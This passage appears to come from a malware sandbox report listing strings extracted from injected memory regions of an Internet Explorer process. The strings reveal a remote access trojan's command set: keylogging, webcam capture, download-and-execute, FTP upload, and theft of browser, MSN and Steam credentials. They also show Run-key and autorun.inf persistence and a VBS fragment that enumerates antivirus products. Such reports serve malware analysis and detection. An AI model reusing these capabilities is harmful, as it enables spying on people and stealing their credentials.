000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02980000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_029C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02A00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02A40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02A80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02AC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02B00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02B40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02B80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02BC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02C00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02C40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02C80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02CC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02D00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02D40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02D80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02DC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02DF0000_00001000:</b><pre>GetProcessHeap</pre><b>iexplore.exe_396_rwx_02E00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02E40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02E80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02EC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02F00000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02F40000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02F80000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_02FC0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03000000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03040000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03080000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_030C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03100000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03140000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03180000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_031C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03200000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03240000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03280000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_032C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03300000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03340000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03380000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_033C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03400000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03440000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03480000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_034B0000_00001000:</b><pre>CreatePipe</pre><b>iexplore.exe_396_rwx_034C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03500000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03540000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03580000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_035C0000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03600000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_03630000_00001000:</b><pre>mpr.dll</pre><b>iexplore.exe_396_rwx_03770000_00001000:</b><pre>mpr.dll</pre><b>iexplore.exe_396_rwx_037B0000_00001000:</b><pre>mpr.dll</pre><b>iexplore.exe_396_rwx_037F0000_00001000:</b><pre>mpr.dll</pre><b>iexplore.exe_396_rwx_03820000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03960000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_039A0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_039E0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03A20000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03A60000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03AA0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03AE0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03B20000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03B60000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03BA0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03BE0000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03C20000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03C60000_00001000:</b><pre>gdi32.dll</pre><b>iexplore.exe_396_rwx_03C90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03DD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03E10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03E50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03E80000_00001000:</b><pre>keybd_event</pre><b>iexplore.exe_396_rwx_03E90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03ED0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03F10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03F50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03F90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_03FD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04010000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04050000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04090000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_040D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04110000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04150000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04190000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_041D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04210000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04250000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04290000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_042D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04310000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04350000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04390000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_043D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04410000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04440000_00001000:</b><pre>MapVirtualKeyA</pre><b>iexplore.exe_396_rwx_04450000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04490000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_044D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04510000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04550000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04590000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_045D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04610000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04650000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04690000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_046D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04710000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04750000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04790000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_047D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04810000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04850000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04890000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_048C0000_00001000:</b><pre>GetKeyboardState</pre><b>iexplore.exe_396_rwx_048D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04900000_00001000:</b><pre>GetKeyboardLayoutNameA</pre><b>iexplore.exe_396_rwx_04910000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04940000_00001000:</b><pre>GetKeyState</pre><b>iexplore.exe_396_rwx_04950000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04990000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_049D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04AD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B40000_00001000:</b><pre>GetAsyncKeyState</pre><b>iexplore.exe_396_rwx_04B50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04BD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C40000_00001000:</b><pre>ExitWindowsEx</pre><b>iexplore.exe_396_rwx_04C50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C80000_00001000:</b><pre>EnumWindows</pre><b>iexplore.exe_396_rwx_04C90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04CD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04DD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04ED0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F80000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_050C0000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_05100000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_05130000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_05270000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_052A0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_053E0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05420000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05460000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_054A0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_054D0000_00001000:</b><pre>FtpGetFileSize</pre><b>iexplore.exe_396_rwx_054E0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05510000_00001000:</b><pre>FtpSetCurrentDirectoryA</pre><b>iexplore.exe_396_rwx_05520000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05550000_00001000:</b><pre>FtpOpenFileA</pre><b>iexplore.exe_396_rwx_05560000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05590000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_056D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05710000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05750000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05790000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_057D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05810000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05850000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05890000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_058D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05910000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05950000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05990000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_059D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A10000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A50000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A90000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05AD0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B10000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B50000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B80000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05CC0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05D00000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05D30000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05E70000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05EB0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05EF0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05F20000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06060000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_060A0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_060E0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06120000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06160000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_061B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_061F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06230000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06270000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_062B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_062F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06330000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06370000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_063B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_063E0000_00001000:</b><pre>GdiplusShutdown</pre><b>iexplore.exe_396_rwx_063F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06430000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06470000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_064B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_064E0000_00001000:</b><pre>AVICAP32.DLL</pre><b>iexplore.exe_396_rwx_06620000_00001000:</b><pre>AVICAP32.DLL</pre><b>iexplore.exe_396_rwx_06650000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06690000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_066D0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06710000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06760000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_067A0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_067E0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06930000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06970000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_069B0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_069E0000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B20000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B60000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06CD0000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D10000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D50000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06DD0000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06E10000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06E50000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06E90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06EC0000_00001000:</b><pre>powrprof.dll</pre><b>iexplore.exe_396_rwx_06F00000_00001000:</b><pre>powrprof.dll</pre><b>iexplore.exe_396_rwx_06F30000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07180000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_071C0000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07200000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07240000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07280000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_072C0000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07300000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07330000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_07470000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_074B0000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_074F0000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_10410000_0005C000:</b><pre>.idata</pre><pre>.reloc</pre><pre>P.rsrc</pre><pre>kernel32.dll</pre><pre>Portions Copyright (c) 1999,2003 Avenger by NhT</pre><pre>SHFileOperationA</pre><pre>shell32.dll</pre><pre>URLDownloadToFileA</pre><pre>urlmon.dll</pre><pre>ShellExecuteA</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</pre><pre>GetWindowsDirectoryA</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>http\shell\open\command</pre><pre>\Internet Explorer\iexplore.exe</pre><pre>####@####</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>Portugal</pre><pre>Turkey</pre><pre>Windows 3.1</pre><pre>Windows 95 (Release 2)</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>%s %s</pre><pre>Windows XP Professional x64</pre><pre>Windows XP Home</pre><pre>Windows XP Professional</pre><pre>Windows 2000 Professional</pre><pre>Windows NT %d.%d</pre><pre>Windows 2008</pre><pre>%s %s Server</pre><pre>Windows 2003 Server Datacenter</pre><pre>Windows 2003 Server Enterprise</pre><pre>Windows 2003 Server Web Edition</pre><pre>Windows 2003 Server</pre><pre>Windows Home Server</pre><pre>Windows 2003 Server (Release 2)</pre><pre>Windows 2000 Server Datacenter</pre><pre>Windows 2000 Server Enterprise</pre><pre>Windows 2000 Server Web Edition</pre><pre>Windows 2000 Server</pre><pre>Windows NT 4.0 Server Datacenter</pre><pre>Windows NT 4.0 Server Enterprise</pre><pre>Windows NT 4.0 Server Web Edition</pre><pre>Windows NT 4.0 Server</pre><pre>Unknown Platform ID (%d)</pre><pre>%d.%d</pre><pre>%s (Build: %d</pre><pre>- Service Pack: %s</pre><pre>KERNEL32.DLL</pre><pre>teste.vbs</pre><pre>teste.txt</pre><pre>Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")</pre><pre>Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)</pre><pre>Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)</pre><pre>Set objFileSystem = CreateObject("Scripting.fileSystemObject")</pre><pre>Set objFile = objFileSystem.CreateTextFile("</pre><pre>Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter</pre><pre>Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter</pre><pre>objFile.WriteLine(Info)</pre><pre>objFile.Close</pre><pre>cscript.exe</pre><pre>AVICAP32.dll</pre><pre>tFtpAccess</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: exported symbol not found</pre><pre>SetupApi.dll</pre><pre>SetupDiOpenClassRegKey</pre><pre>SetupDiOpenClassRegKeyExA</pre><pre>SetupDiOpenClassRegKeyExW</pre><pre>SetupDiCreateDeviceInterfaceRegKeyA</pre><pre>SetupDiCreateDeviceInterfaceRegKeyW</pre><pre>SetupDiOpenDeviceInterfaceRegKey</pre><pre>SetupDiDeleteDeviceInterfaceRegKey</pre><pre>SetupDiCreateDevRegKeyA</pre><pre>SetupDiCreateDevRegKeyW</pre><pre>SetupDiOpenDevRegKey</pre><pre>SetupDiDeleteDevRegKey</pre><pre>CM_DEVCAP_LOCKSUPPORTED</pre><pre>CM_DEVCAP_EJECTSUPPORTED</pre><pre>PDCAP_D0_SUPPORTED</pre><pre>PDCAP_D1_SUPPORTED</pre><pre>PDCAP_D2_SUPPORTED</pre><pre>PDCAP_D3_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D0_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D1_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D2_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D3_SUPPORTED</pre><pre>PDCAP_WARM_EJECT_SUPPORTED</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>127.0.0.1</pre><pre>iphlpapi.dll</pre><pre>AllocateAndGetTcpExTableFromStack</pre><pre>AllocateAndGetUdpExTableFromStack</pre><pre>SetTcpEntry</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>Mozilla3_5Password</pre><pre>GetChromePass</pre><pre>StartHttpProxy</pre><pre>1.2.3</pre><pre>XxX.xXx</pre><pre>UuU.uUu</pre><pre>keyboardkey</pre><pre>webcaminactive</pre><pre>webcamgetbuffer</pre><pre>webcam</pre><pre>enviarexecnormal</pre><pre>enviarexechidden</pre><pre>openweb</pre><pre>downexec</pre><pre>sendftp</pre><pre>keylogger</pre><pre>keyloggergetlog</pre><pre>keyloggereraselog</pre><pre>keyloggerativar</pre><pre>keyloggerdesativar</pre><pre>renamekey</pre><pre>windowsfechar</pre><pre>windowsmax</pre><pre>windowsmin</pre><pre>windowsmostrar</pre><pre>windowsocultar</pre><pre>windowsmintodas</pre><pre>windowscaption</pre><pre>listarportas</pre><pre>listarportasdns</pre><pre>finalizarprocessoportas</pre><pre>webcamsettings</pre><pre>chatmsg</pre><pre>getpassword</pre><pre>updateservidorweb</pre><pre>keyloggersearch</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>PSAPI.dll</pre><pre>\config\SteamAppData.vdf</pre><pre>AutoLoginUser</pre><pre>/ClientRegistry.Blob</pre><pre>\ClientRegistry.blob</pre><pre>\steam.dll</pre><pre>%SYS%</pre><pre>ÞSKTOP%</pre><pre>TThreadSearch`%D</pre><pre>FirstExecution</pre><pre>chatmsg|</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>listarjanelas|windowsfechar|</pre><pre>listarjanelas|windowsmax|</pre><pre>listarjanelas|windowsmin|</pre><pre>listarjanelas|windowsmostrar|</pre><pre>listarjanelas|windowsocultar|</pre><pre>listarjanelas|windowsmintodas|</pre><pre>listarjanelas|windowscaption|</pre><pre>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>listarportas|listadeportaspronta|</pre><pre>listarportas|finalizarconexao|</pre><pre>listarportas|finalizarprocessoportas|Y|</pre><pre>listarportas|finalizarprocessoportas|N|</pre><pre>registro|renamekey|</pre><pre>keylogger|keylogger|keyloggerativar|</pre><pre>keylogger|keylogger|keyloggerdesativar|</pre><pre>keylogger|keyloggergetlog|</pre><pre>keylogger|keylogger|keyloggervazio|</pre><pre>keyloggersearchok|</pre><pre>webcam|webcaminactive|</pre><pre>webcam|webcamactive|</pre><pre>_x_X_PASSWORDLIST_X_x_</pre><pre>NOIP.abc</pre><pre>MSN.abc</pre><pre>FIREFOX.abc</pre><pre>IELOGIN.abc</pre><pre>IEPASS.abc</pre><pre>IEAUTO.abc</pre><pre>IEWEB.abc</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox</pre><pre>getfirefox</pre><pre>getielogin</pre><pre>getiepass</pre><pre>getieweb</pre><pre>getchrome</pre><pre>getpassword|getpasswordlist|</pre><pre>getpassword|getpassworderror|</pre><pre>##@@## ##@@## ##@@##</pre><pre>Windows\CurrentVersion\Uninstall\eDonkey2000</pre><pre>UNWISE.EXE</pre><pre>ntdll.dll</pre><pre>icon=shell32.dll,4</pre><pre>shellexecute=</pre><pre>autorun.inf</pre><pre>XX--XX--XX.txt</pre><pre>logs.dat</pre><pre>SQLite3.dll</pre><pre>deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark 